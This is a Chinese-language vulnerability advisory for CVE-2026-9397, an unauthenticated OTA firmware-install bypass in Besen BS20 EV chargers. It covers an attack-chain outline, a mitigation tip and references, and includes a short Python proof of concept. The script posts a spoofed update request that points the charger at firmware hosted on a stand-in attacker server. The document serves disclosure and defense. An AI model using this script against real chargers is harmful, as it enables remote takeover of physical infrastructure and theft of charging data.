CVE-2026-9397 Besen BS20充电桩OTA更新授权绕过漏洞

漏洞信息

漏洞编号

CVE-2026-9397

漏洞类型

认证绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Besen BS20 EV Charging Station

漏洞概述

Besen BS20电动汽车充电站在固件版本20260426及之前的OTA更新安装处理程序中存在安全漏洞。由于授权检查不当，攻击者可以通过欺骗性的OTA更新远程安装未经授权的固件。该漏洞利用无需用户交互和身份认证，且攻击复杂度较高。成功利用可能导致设备机密性、完整性和可用性完全受损，存在严重安全隐患。

技术细节

该漏洞的核心在于Besen BS20充电桩的OTA更新机制未能正确验证固件更新请求的合法性。攻击者可以利用网络向设备发送特制的恶意OTA更新包。由于系统在处理OTA更新安装时存在授权不当的缺陷，未对更新源进行严格的身份认证或签名校验，导致攻击者能够绕过安全检查。一旦设备接受了恶意的固件更新，攻击者即可获得设备的最高控制权，进而窃取充电数据、篡改设备设置或破坏充电桩的正常运行，且整个过程无需物理接触设备。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出在线的Besen BS20 EV充电站设备。

STEP 2

2. 恶意固件准备

攻击者准备或托管一份包含后门或恶意功能的伪造固件更新包。

STEP 3

3. 发起欺骗性OTA请求

攻击者向目标设备的OTA安装处理程序接口发送特制的HTTP请求，指向恶意固件地址。

STEP 4

4. 绕过授权安装

由于设备未验证请求来源的合法性，设备下载并执行了未经授权的固件更新。

STEP 5

5. 获取控制权

恶意固件安装完成后，攻击者获得设备的完全控制权，影响机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-9397
# This script demonstrates how a malicious OTA update could be sent.
# Note: For educational purposes only.

import requests

def send_malicious_ota(target_ip, malicious_firmware_url):
    """
    Simulates sending a spoofed OTA update request to the target device.
    """
    # The endpoint might vary based on actual device API analysis
    ota_endpoint = f"http://{target_ip}/api/ota/install"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "BesenOTAUpdater/1.0"
    }
    
    # Payload instructing device to download and install firmware from attacker controlled URL
    payload = {
        "version": "20260427_malicious",
        "url": malicious_firmware_url,
        "force_update": True
    }
    
    try:
        response = requests.post(ota_endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] OTA update command sent successfully to {target_ip}")
            print(f"[+] Device instructed to download from: {malicious_firmware_url}")
        else:
            print(f"[-] Failed to send OTA command. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    evil_server = "http://attacker-server.com/malware.bin"
    send_malicious_ota(target, evil_server)

影响范围

Besen BS20 EV Charging Station <= 20260426

防御指南

临时缓解措施

建议将设备网络隔离，禁止未经授权的外部网络访问，并定期检查设备固件版本，等待官方补丁发布后立即更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9397
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9397
3 Details https://www.cvedetails.com/cve/CVE-2026-9397/
4 VulDB https://vuldb.com/cve/CVE-2026-9397
5 Link https://github.com/carfeii/besen#finding-4-unauthorized-firmware-installation-via-spoofed-ota-updates
6 Link https://vuldb.com/submit/813576
7 Link https://vuldb.com/vuln/365378
8 Link https://vuldb.com/vuln/365378/cti